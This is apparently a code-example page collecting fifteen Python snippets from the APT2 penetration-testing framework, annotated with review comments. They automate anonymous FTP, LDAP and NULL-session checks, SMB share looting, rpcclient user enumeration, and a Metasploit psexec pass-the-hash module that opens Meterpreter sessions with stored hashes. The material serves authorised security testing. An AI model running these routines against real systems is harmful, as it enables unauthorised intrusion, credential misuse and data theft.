

Python Utils.getRandStr方法代码示例

本文整理汇总了Python中core.utils.Utils.getRandStr方法的典型用法代码示例。如果您正苦于以下问题:Python Utils.getRandStr方法的具体用法?Python Utils.getRandStr怎么用?Python Utils.getRandStr使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在core.utils.Utils的用法示例。


在下文中一共展示了Utils.getRandStr方法的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: processTarget

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
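 def processTarget(self, t, port):
     """Send an HTTP OPTIONS request to ``t:port`` and record risky verbs.

     The ``Allow`` response header is checked for PUT, DELETE, TRACE and
     TRACK. Each verb found fires an ``httpOption<VERB>`` event and is
     recorded through ``addVuln``. A summary plus the full response headers
     is written to a randomly suffixed file under ``proofsDir``.

     Args:
         t: Host name or address to connect to.
         port: TCP port of the HTTP service.

     Errors while connecting, parsing or writing are swallowed: the probe is
     best-effort and must not stop the caller.
     """
     seen_key = t + str(port)
     if self.seentarget(seen_key):
         return
     self.addseentarget(seen_key)
     self.display.verbose(self.shortName + " - Connecting to " + t)

     conn = None
     try:
         conn = httplib.HTTPConnection(t, port, timeout=10)
         conn.request('OPTIONS', '/')
         response = conn.getresponse()
         allowed = response.getheader('allow')
         outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
             port) + "_" + Utils.getRandStr(10)
         if allowed:
             # str has no .contains(); the original call raised AttributeError,
             # which the blanket handler hid, so nothing was ever reported.
             # Compare whole verbs case-insensitively instead of substrings.
             offered = [verb.strip().upper() for verb in allowed.split(",")]
             for badopt in ['PUT', 'DELETE', 'TRACE', 'TRACK']:
                 if badopt in offered:
                     self.fire("httpOption" + badopt)
                     # "/" is encoded so the path can be embedded in a
                     # slash-separated key.
                     self.addVuln(t, "httpOption" + badopt,
                                  {"port": str(port), "output": outfile.replace("/", "%2F")})
                     # The original formatted an undefined name `host` here.
                     self.display.error("VULN [httpOption%s] Found on [%s:%i]" % (badopt, t, int(port)))
             text = "Allowed HTTP Options for %s : %s\n\nFull Headers:\n%s" % (
                 t, allowed, self.print_dict(response.getheaders()))
         else:
             text = "Allowed HTTP Options for %s : OPTIONS VERB NOT ALLOWED\n\nFull Headers:\n%s" % (
                 t, self.print_dict(response.getheaders()))
         # NOTE: the headers come from the remote server; treat the proof file
         # as untrusted text when it is later rendered in a report.
         Utils.writeFile(text, outfile)
     except Exception:
         # Best-effort probe. Catching Exception rather than using a bare
         # except lets KeyboardInterrupt and SystemExit propagate.
         pass
     finally:
         if conn is not None:
             conn.close()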
开发者ID:MooseDojo,项目名称:apt2,代码行数:33,代码来源:scan_httpoptions.py

示例2: searchTarget

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
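    def searchTarget(self, target, port, username, password):
        """Log in to the FTP server on ``target`` and fetch files matching ``self.filepatterns``.

        A packet capture is started first and written to a randomly suffixed
        file under ``proofsDir`` whether or not the login succeeds.

        Args:
            target: Host to connect to.
            port: Used only for the capture filter and the capture file name.
                The reachability check is hard-coded to port 21 and no port is
                passed to ``FTPHost``.
            username: FTP user name.
            password: FTP password.

        Returns:
            True if the FTP session was opened, False otherwise.
        """
        success = False
        # start packet capture
        cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10,
                          srcip="", dstip=target)
        try:
            if Utils.port_open(target, 21):
                # The context manager closes the session, so no explicit close() is needed.
                with ftputil.FTPHost(target, username, password) as host:
                    success = True
                    for root, dirs, files in host.walk("/", topdown=True, onerror=None):
                        # The original wrapped this in an extra `for name in files`
                        # loop that never used `name`, so every match was fetched
                        # once per file in the directory.
                        for pattern in self.filepatterns:
                            for fname in fnmatch.filter(files, pattern):
                                fpath = host.path.join(root, fname)
                                if host.path.isfile(fpath):
                                    # The original referenced an undefined name `ip`;
                                    # `target` is the host in scope. Replacing "/" keeps
                                    # the remote path from creating local directories.
                                    host.download(fpath, self.config["proofsDir"] + target + fpath.replace("/", "_"))
        except ftputil.error.PermanentError:
            self.display.error("Could not connect to %s on port 21" % (target))

        outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(
            port) + "_" + target + "_" + Utils.getRandStr(10)
        Utils.writeFile(self.getPktCap(cap), outfile)
        kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        return success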
开发者ID:0x0mar,项目名称:apt2,代码行数:31,代码来源:searchftp.py

示例3: run

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
    def run(self, target="127.0.0.1", ports="1-1024", flags="-sS", vector="", filetag=""):
        """Run nmap against ``target`` and return the parsed XML report.

        The output base name is ``<proofsDir>NMAP-<filetag>-<random>`` and is
        kept on ``self.outfile``; nmap's ``-oA`` option derives the report
        files from it. ``vector`` is accepted but not used in this method.
        """
        # An absent proofsDir setting means the files get no directory prefix.
        base_dir = self.config["proofsDir"] if "proofsDir" in self.config.keys() else ""
        self.outfile = base_dir + "NMAP-" + filetag + "-" + Utils.getRandStr(10)

        # NOTE(review): the command line is assembled from caller-supplied strings
        # with no quoting. If Utils.execWait hands it to a shell, target, ports,
        # flags and filetag must come from trusted input only - confirm.
        argv_text = " ".join(["nmap", flags, "-p", ports, "-oA", self.outfile, target])
        Utils.execWait(argv_text)
        self.display.output("Scan file saved to [%s]" % self.outfile)

        xml_report = self.outfile + ".xml"
        return self.loadXMLFile(xml_report, "nmapFile")
开发者ID:HMSH00D,项目名称:apt2,代码行数:14,代码来源:mynmap.py

示例4: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
    def process(self):
        """Run the external ``responder`` command for 60 seconds.

        The second argument to ``Utils.execWait`` is a randomly suffixed path
        under ``proofsDir`` (presumably where the output is stored - confirm).
        The interface name ``eth0`` is hard-coded in the command.
        """
        name_prefix = self.config["proofsDir"] + self.shortName
        capture_path = name_prefix + "_" + Utils.getRandStr(10)

        # A 15-minute run (timeout=900) was the earlier setting; 60 seconds is used now.
        Utils.execWait("responder -I eth0 -wrf", capture_path, timeout=60)

        # TODO: inspect the output for results; if there are none, wait
        # 5 minutes and run again for 15 minutes, repeating a bounded
        # number of times.
开发者ID:0x0mar,项目名称:apt2,代码行数:16,代码来源:responder.py

示例5: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
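    def process(self):
        """Scan each new target with nmap and publish its open ports.

        For every target not seen before, ``mynmap.run`` is called with the
        flags ``-sS -A``. Each open TCP/UDP port fires a ``newPort<port>``
        event and is added to the knowledge base; a service named ``http`` or
        ``https`` also fires ``web``.
        """
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            # skip hosts that were already tested
            if self.seentarget(t):
                continue
            self.addseentarget(t)
            # NOTE: this name is generated but not used later in this method.
            temp_file = self.config["proofsDir"] + Utils.getRandStr(10)

            # The original passed `self.diaplay`, a misspelling of the `display`
            # attribute, which raises AttributeError before any scan starts.
            n = mynmap(self.config, self.display)
            scan_results = n.run(target=t, flags="-sS -A", vector=self.vector)['scan']

            for host in scan_results.keys():
                for proto in ['tcp', 'udp']:
                    if proto not in scan_results[host]:
                        continue
                    for port in scan_results[host][proto].keys():
                        s = scan_results[host][proto][port]
                        # only open ports are of interest
                        if s["state"] != "open":
                            continue
                        self.fire("newPort" + str(port))
                        kb.add('host/' + host + '/' + proto + 'port', port)
                        if s['name'] in ('http', 'https'):
                            self.fire('web')
                        # TODO: per-script output under s['script'] is not processed yet.
        return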
开发者ID:0x0mar,项目名称:apt2,代码行数:45,代码来源:nmapbasescan.py

示例6: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
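    def process(self):
        """Check each new target for an unauthenticated (NULL) RPC session.

        ``nmblookup -A`` is run first to learn the workgroup/domain name, then
        ``rpcclient`` is run with an empty user name and ``-c srvinfo``. Unless
        the output contains NT_STATUS_LOGON_FAILURE or NT_STATUS_ACCESS_DENIED,
        a ``nullSession`` event is fired and the finding is stored with
        ``addVuln``. Both command outputs go to randomly suffixed files under
        ``proofsDir``.
        """
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            # skip hosts that were already tested
            if self.seentarget(t):
                continue
            self.addseentarget(t)
            self.display.verbose(self.shortName + " - Connecting to " + t)

            # get windows domain/workgroup
            temp_file2 = self.config["proofsDir"] + "nmblookup_" + t + "_" + Utils.getRandStr(10)
            command2 = self.config["nmblookup"] + " -A " + t
            result2 = Utils.execWait(command2, temp_file2)
            workgroup = "WORKGROUP"
            for line in result2.split('\n'):
                m = re.match(r'\s+(.*)\s+<00> - <GROUP>.*', line)
                if not m:
                    continue
                candidate = m.group(1).strip()
                # The name is reported by the remote host and is pasted into the
                # rpcclient command line below, so the scanned host controls part
                # of a command run on the operator's machine. Accept only a
                # conservative character set; anything else keeps the default.
                if re.match(r'^[A-Za-z0-9._-]+$', candidate):
                    workgroup = candidate
                    self.display.debug("found ip [%s] is on the workgroup/domain [%s]" % (t, workgroup))
                else:
                    self.display.debug("ignoring unexpected workgroup/domain name reported by [%s]" % t)

            # make outfile
            outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)

            # run rpcclient
            # NOTE(review): `t` is also concatenated unquoted; presumably targets
            # are operator-supplied - confirm they are validated upstream.
            command = self.config["rpcclient"] + " -N -U \"\" -W " + workgroup + " " + t + " -c srvinfo"
            result = Utils.execWait(command, outfile)

            # check to see if it worked
            if any(x in result for x in ["NT_STATUS_LOGON_FAILURE", "NT_STATUS_ACCESS_DENIED"]):
                self.display.verbose("Could not get NULL Session on %s" % t)
            else:
                self.fire("nullSession")
                self.addVuln(t, "nullSession", {"type": "rpc", "output": outfile.replace("/", "%2F")})
                self.display.error("VULN [NULLSession] Found on [%s]" % t)

                # TODO - process rpcclient srvinfo results
                # parse output and store any new info and fire any additional triggers
        return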
开发者ID:MooseDojo,项目名称:apt2,代码行数:44,代码来源:scan_rpcclient_nullsession.py

示例7: processTarget

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
    def processTarget(self, t, port):
        """Fetch ``/`` from ``t:port`` and record the ``Server`` response header.

        When the header is present, its value and the full response headers
        are written to a randomly suffixed file under ``proofsDir`` and the
        file is registered in the knowledge base. Every error is swallowed.
        """
        seen_key = t + str(port)
        if self.seentarget(seen_key):
            return
        self.addseentarget(seen_key)
        self.display.verbose(self.shortName + " - Connecting to " + t)

        try:
            conn = httplib.HTTPConnection(t, port, timeout=10)
            conn.request('GET', '/')
            response = conn.getresponse()

            banner = response.getheader('server')
            if banner:
                file_suffix = "_" + t + "_" + str(port) + "_" + Utils.getRandStr(10)
                outfile = self.config["proofsDir"] + self.shortName + file_suffix
                report = "Identified Server Version of %s : %s\n\nFull Headers:\n%s" % (
                    t, banner, self.print_dict(response.getheaders()))
                Utils.writeFile(report, outfile)
                # "/" is encoded so the path fits into the slash-separated key.
                kb_key = "host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")
                kb.add(kb_key)
        except httplib.BadStatusLine:
            pass
        # NOTE(review): the bare handler below also hides programming errors and
        # KeyboardInterrupt; narrowing it would change behaviour, so it is kept.
        except:
            pass
开发者ID:MooseDojo,项目名称:apt2,代码行数:24,代码来源:scan_httpserverversion.py

示例8: testTarget

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
    def testTarget(self, host, port):
        """Check whether the FTP service on ``host:port`` accepts an anonymous login.

        A packet capture is started before connecting. If the login reply
        contains "Login successful", an ``anonymousFtp`` event is fired and the
        finding is stored with ``addVuln``. The capture is written to a
        randomly suffixed file under ``proofsDir`` once the session is closed.
        """
        seen_key = host + str(port)
        # each host/port pair is tested only once
        if self.seentarget(seen_key):
            return
        self.addseentarget(seen_key)
        self.display.verbose(self.shortName + " - Connecting to " + host)

        capture_filter = "tcp and port " + str(port) + " and host " + host
        cap = self.pktCap(filter=capture_filter, packetcount=10, timeout=10,
                          srcip=self.config['lhost'], dstip=host)

        ftp = FTP()
        not_found_msg = "Could not find FTP server located at " + host + " Port " + str(port)
        login_failed_msg = "Could not login as anonymous to FTP at " + host
        try:
            ftp.connect(host, int(port))

            name_prefix = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(port)
            outfile = name_prefix + "_" + host + "_" + Utils.getRandStr(10)

            try:
                # NOTE(review): the password literal looks like an e-mail
                # obfuscation artifact of the hosting page - confirm the real
                # value against the project source.
                reply = ftp.login("anonymous", "[email protected]")
                if "Login successful" not in reply:
                    self.display.verbose(login_failed_msg)
                else:
                    self.fire("anonymousFtp")
                    self.addVuln(host, "anonymousFTP", {"port": str(port), "output": outfile.replace("/", "%2F")})
                    self.display.error("VULN [AnonymousFTP] Found on [%s]" % host)
            except error_perm:
                self.display.verbose(login_failed_msg)

            ftp.close()

            # store the captured packets as proof
            Utils.writeFile(self.getPktCap(cap), outfile)
        except (EOFError, socket.error):
            self.display.verbose(not_found_msg)
开发者ID:MooseDojo,项目名称:apt2,代码行数:41,代码来源:scan_anonftp.py

示例9: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
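    def process(self):
        """Run TestSSLServer.jar against each known HTTPS/SSL port of every target.

        Ports are read from the knowledge base. For each host/port pair not
        seen before, the jar is run with a 30 second timeout and
        ``Utils.execWait`` is given a randomly suffixed path under
        ``proofsDir``. The output is not parsed yet.
        """
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            ports = kb.get(['service/https/host/' + t + '/tcpport', 'service/ssl/host/' + t + '/tcpport'])
            for port in ports:
                # The original concatenated `port` directly into the command while
                # using str(port) everywhere else; convert once so a non-string
                # port cannot raise TypeError.
                port_str = str(port)
                if self.seentarget(t + port_str):
                    continue
                self.addseentarget(t + port_str)

                temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + port_str + "_" + Utils.getRandStr(10)

                # NOTE(review): the command is built by concatenation; `t` and the
                # port must come from trusted data if execWait uses a shell - confirm.
                command = "java -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port_str
                Utils.execWait(command, temp_file, timeout=30)

                # TODO - parse output and store results?

        return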
开发者ID:0x0mar,项目名称:apt2,代码行数:25,代码来源:ssltestsslserver.py

示例10: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
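    def process(self):
        """Run TestSSLServer.jar per HTTPS/SSL port and store weak settings in the KB.

        The tool output is read back from the file passed to
        ``Utils.execWait`` and scanned for:

        * the "Supported versions:" line - every listed version among SSLv2,
          SSLv3, TLSv1.0 and TLSv1.1 is recorded as deprecated;
        * the indented cipher lines following the "TLSv1.2" heading - a cipher
          whose name contains DES, RSA or NULL is recorded as weak.
        """
        # load any targets we are interested in
        self.getTargets()

        deprecated_protocols = ["SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"]
        weak_markers = ["DES", "RSA", "NULL"]

        for t in self.targets:
            ports = kb.get('service/https/' + t + '/tcp', 'service/ssl/' + t + '/tcp')
            for port in ports:
                # Convert once: the original mixed str(port) with bare `port`
                # in string concatenation.
                port_str = str(port)
                if self.seentarget(t + port_str):
                    continue
                self.addseentarget(t + port_str)

                temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + port_str + "_" + Utils.getRandStr(10)

                command = self.config["java"] + " -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port_str
                Utils.execWait(command, temp_file, timeout=30)

                depricatedlist = []
                weakciphers = []
                # Nothing in this method fills keystrength yet, so the
                # weakSSLKeyStrength entry below is currently never written.
                keystrength = ""
                tls12 = False
                with open(temp_file, "r") as myfile:
                    lines = myfile.readlines()

                for line in lines:
                    if tls12:
                        # cipher lines under the TLSv1.2 heading are indented by four spaces
                        if re.match(r'^    (.*)', line):
                            cipher = line.strip()
                            if any(mark in cipher for mark in weak_markers) and cipher not in weakciphers:
                                weakciphers.append(cipher)
                        else:
                            tls12 = False
                    else:
                        m = re.match(r'^\s*Supported versions: (.*)', line)
                        if m:
                            # The original if/elif chain stopped at the first hit,
                            # so a server offering several old versions was
                            # reported with only one of them.
                            for protocol in deprecated_protocols:
                                if protocol in m.group(1) and protocol not in depricatedlist:
                                    depricatedlist.append(protocol)
                        # The dot is escaped so only the literal "TLSv1.2" heading matches.
                        if re.match(r'^  TLSv1\.2\s*', line):
                            tls12 = True

                # store data into KB
                kb_prefix = 'service/https/' + t + '/tcp/' + port_str
                for depricatedProto in depricatedlist:
                    kb.add(kb_prefix + '/depricatedSSLProto/' + depricatedProto)
                for weakCipher in weakciphers:
                    kb.add(kb_prefix + '/weakSSLCipher/' + weakCipher)
                # `is not ""` compared identity, not value; use a value comparison.
                if keystrength != "":
                    kb.add(kb_prefix + '/weakSSLKeyStrength/' + keystrength)

        return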
开发者ID:MooseDojo,项目名称:apt2,代码行数:78,代码来源:scan_testsslserver.py

示例11: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
    def process(self):
        """Query each new target's LDAP service on port 389 with a simple bind and no credentials.

        ``ldapsearch -x -s base`` is run per target. Every ``ref: ...`` line
        in the output is stored as an ``AnonymousLDAP`` finding, and a single
        ``anonymousLDAP`` event is fired at the end if any finding was stored.
        """
        self.getTargets()

        found_any = False
        for t in self.targets:
            # each host is queried only once
            if self.seentarget(t):
                continue
            self.display.verbose(self.shortName + " - Connecting to " + t)
            self.addseentarget(t)

            outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)

            # run ldapsearch against the base object
            # NOTE(review): `t` is concatenated unquoted into the command line;
            # it must be trusted input if execWait uses a shell - confirm.
            ldap_command = "ldapsearch -h " + t + " -p 389 -x -s base"
            result = Utils.execWait(ldap_command, outfile)

            # TODO - Parse output and do stuff
            for referral in re.findall("ref: .*", result):
                found_any = True
                details = {
                    "port": "389",
                    "message": str(referral).replace("/", "%2F"),
                    "output": outfile.replace("/", "%2F"),
                }
                self.addVuln(t, "AnonymousLDAP", details)

        if found_any:
            self.fire("anonymousLDAP")

        return
开发者ID:HMSH00D,项目名称:apt2,代码行数:30,代码来源:anonldap.py

示例12: searchDir

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
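    def searchDir(self, host, conn, share, path, depth=0):
        """Walk ``path`` on an SMB share and save files matching ``self.filepatterns``.

        Args:
            host: Host name, used only to build the local file name.
            conn: Connection object providing ``listPath`` and ``retrieveFile``.
            share: Share name.
            path: Directory inside the share, ending with "/".
            depth: Current recursion depth; the walk stops once it exceeds 5.

        Any failure while listing or retrieving is reported through the debug
        display and ends the walk of this directory.
        """
        if depth > 5:
            return

        try:
            names = conn.listPath(share, path, timeout=30)

            for name in names:
                if name.isDirectory:
                    if name.filename not in [u'.', u'..']:
                        # The original passed (conn, host, ...), swapping the first
                        # two arguments; the nested call then failed inside the
                        # handler below and subdirectories were never visited.
                        self.searchDir(host, conn, share, path + name.filename + '/', depth + 1)
                else:
                    for pattern in self.filepatterns:
                        try:
                            matcher = re.compile(pattern)
                        except re.error:
                            # invalid patterns are skipped silently
                            continue
                        if matcher.match(name.filename):
                            # The file name is chosen by the remote server; "/" is
                            # replaced so it cannot add directories to the local path.
                            outfile = self.config["proofsDir"] + self.shortName + "_" + host + "_" + share + "_" + name.filename.replace("/", "-") + "_" + Utils.getRandStr(10)
                            temp_fh = StringIO()
                            conn.retrieveFile(share, path + name.filename, temp_fh)
                            temp_fh.seek(0)
                            Utils.writeFile(temp_fh.getvalue(), outfile)
                            self.display.debug("_____    Share[" + share + "] =" + path + name.filename)
        except Exception:
            # Catching Exception instead of a bare except keeps
            # KeyboardInterrupt and SystemExit from being swallowed.
            self.display.debug('### can not access the resource')

        return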
开发者ID:MooseDojo,项目名称:apt2,代码行数:34,代码来源:scan_searchsmbshare.py

示例13: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
    def process(self):
        """Run the Metasploit smb_enumusers scanner per new target and store the users found.

        Console output is collected until it contains "execution completed",
        parsed line by line, then written to a randomly suffixed file under
        ``proofsDir`` that is registered in the knowledge base.
        """
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            # nothing can be done without an authenticated RPC session
            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/smb/smb_enumusers\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("run\n")
                    # msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    # NOTE(review): this loop has no timeout or retry limit; if the
                    # completion marker never appears it does not terminate.
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()

                    # TODO - process results and store user list to KB
                    # need to do something better with this.
                    #    loop over each user and store in the KB
                    #        if local, store in "/host/" + t + "/user/" + user
                    #        if domain, store in "/domain/" + domainname + "/user/" + user

                    # for now, just print out the results
                    # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras)
                    # NOTE(review): only "." is escaped in the target; re.escape(t)
                    # would cover every regex metacharacter.
                    parts = re.findall(".*" + t.replace(".", "\.") + ".*", result)
                    for part in parts:
                        # skip the echo of the "set RHOSTS" command
                        if "RHOSTS" in part:
                            pass
                        else:
                            try:
                                pieces = part.split()
                                domain = pieces[3]
                                kb.add("domain/" + domain.strip() + "/host/" + t)
                                # `extras` is extracted but not used afterwards
                                extras = part.split('(')[1].split(')')[0]
                                users = part.split('[')[3].split(']')[0].split(',')
                                for user in users:
                                    kb.add("host/" + t + "/user/" + user.strip())
                            # NOTE(review): a bare except hides every parsing error,
                            # so lines in an unexpected format are dropped silently.
                            except:
                                pass
                    # keep the raw console output as proof; "/" is encoded for the KB key
                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return
开发者ID:0x0mar,项目名称:apt2,代码行数:60,代码来源:msf_smbuserenum.py

示例14: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
    def process(self):
        """Enumerate user accounts on each new target with rpcclient and store them in the KB.

        ``nmblookup -A`` supplies the workgroup/domain name. ``rpcclient -c
        enumdomusers`` is then run with an empty user name; when its output
        contains NT_STATUS_LOGON_FAILURE or NT_STATUS_ACCESS_DENIED, the
        domain SID is read with ``lsaquery`` and ``self.sids2names`` is asked
        for RIDs 500 to 10000. Every user found is stored per host and, when
        the workgroup is not the default "WORKGROUP", per domain as well.
        """

        def record_user(ip, domain, username):
            # Store the account under the host and, for a real domain, under the domain.
            self.display.debug("IP [%s] has local user [%s]" % (ip, username))
            kb.add('host/' + ip + '/user/' + username)
            if domain != "WORKGROUP":
                self.display.debug("Domain [%s] has user [%s]" % (domain, username))
                kb.add('domain/' + domain + '/user/' + username)

        self.getTargets()

        for t in self.targets:
            # each host is processed only once
            if self.seentarget(t):
                continue
            self.addseentarget(t)
            self.display.verbose(self.shortName + " - Connecting to " + t)

            # look up the windows domain/workgroup
            nmb_outfile = self.config["proofsDir"] + "nmblookup_" + t + "_" + Utils.getRandStr(10)
            nmb_output = Utils.execWait("nmblookup -A " + t, nmb_outfile)
            workgroup = "WORKGROUP"
            for nmb_line in nmb_output.split('\n'):
                group_match = re.match(r'\s+(.*)\s+<00> - <GROUP>.*', nmb_line)
                if group_match:
                    workgroup = group_match.group(1).strip()
                    self.display.debug("found ip [%s] is on the workgroup/domain [%s]" % (t, workgroup))

            # NOTE(review): the workgroup name is reported by the remote host and
            # becomes part of slash-separated KB keys without any validation.
            kb.add('domain/' + workgroup + '/host/' + t)

            enum_outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
            enum_output = Utils.execWait('rpcclient -N -U "" ' + t + ' -c enumdomusers', enum_outfile)

            denied = ("NT_STATUS_LOGON_FAILURE" in enum_output
                      or "NT_STATUS_ACCESS_DENIED" in enum_output)
            if not denied:
                # one "user:[name] rid:[n]" line per account
                for out_line in enum_output.split('\n'):
                    user_match = re.match(r'user:\[(.*)\] rid:\[(.*)\].*', out_line)
                    if user_match:
                        self.fire("newUser")
                        record_user(t, workgroup, user_match.group(1))
                continue

            # fall back to resolving RIDs: the domain SID comes from lsaquery
            lsa_output = Utils.execWait('rpcclient -U "" %s -N -c "lsaquery"' % t, None)
            if "Domain Sid" not in lsa_output:
                continue
            cleaned = lsa_output.replace("WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
            # the SID is taken as the fifth space-separated field of the trimmed output
            sid = cleaned.rstrip().split(" ")[4]
            sid_names = self.sids2names(t, sid, 500, 10000)
            if sid_names:
                for name in sid_names:
                    # the event is fired for every returned name, matched or not
                    self.fire("newUser")
                    qualified = re.match(r'(.*)\\(.*)', name)
                    if qualified:
                        record_user(t, workgroup, qualified.group(2))
        return
开发者ID:0x0mar,项目名称:apt2,代码行数:80,代码来源:userenumrpcclient.py

示例15: process

# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
    def process(self):
        """Drive the Metasploit console once per stored host/user/hash combination.

        Combinations already seen are skipped. The console output of each run
        is written to a randomly suffixed file under ``proofsDir`` and
        registered in the knowledge base; every "Meterpreter session N opened"
        line fires ``msfSession`` and stores the session number.
        """
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            # nothing can be done without an authenticated RPC session
            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                users = kb.get("host/" + t + "/user")
                for user in users:
                    hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash")
                    for passhash in hashes:
                        # verify we have not tested this combination before
                        if not self.seentarget(t+user+passhash):
                            # add the combination to the already seen list
                            self.addseentarget(t+user+passhash)
                            self.display.verbose(self.shortName + " - Connecting to " + t)
                            # NOTE(review): t, user and passhash come from the KB and
                            # are concatenated into newline-terminated console commands
                            # with no validation; values containing line breaks should
                            # be rejected before they reach msf.execute.
                            msf.execute("use exploit/windows/smb/psexec\n")
                            # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
                            # msf.execute("set LHOST %s\n" % self.config['lhost'])
                            # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
                            # msf.execute("set LPORT 4444\n")
                            msf.execute("set RPORT 445\n")
                            msf.execute("set RHOST " + t + "\n")
                            msf.execute("set SMBUser " + user + "\n")
                            msf.execute("set SMBPass " + passhash + "\n")
                            msf.execute("exploit -j\n")
                            # wait the configured delay before reading the console output
                            msf.sleep(int(self.config['msfexploitdelay']))
        
                            # keep the raw console output as proof; "/" is encoded for the KB key
                            outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                            result = msf.getResult()
                            Utils.writeFile(result, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        
                            # one entry per session number reported in the output
                            parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                            for part in parts:
                                self.fire("msfSession")
                                self.display.verbose("NEW session on : " + t)
                                kb.add("host/" + t + "/msfSession/" + str(part))
        
            # clean up after ourselves
            result = msf.cleanup()

        return
开发者ID:HMSH00D,项目名称:apt2,代码行数:52,代码来源:msf_psexec_pth.py


注:本文中的core.utils.Utils.getRandStr方法示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。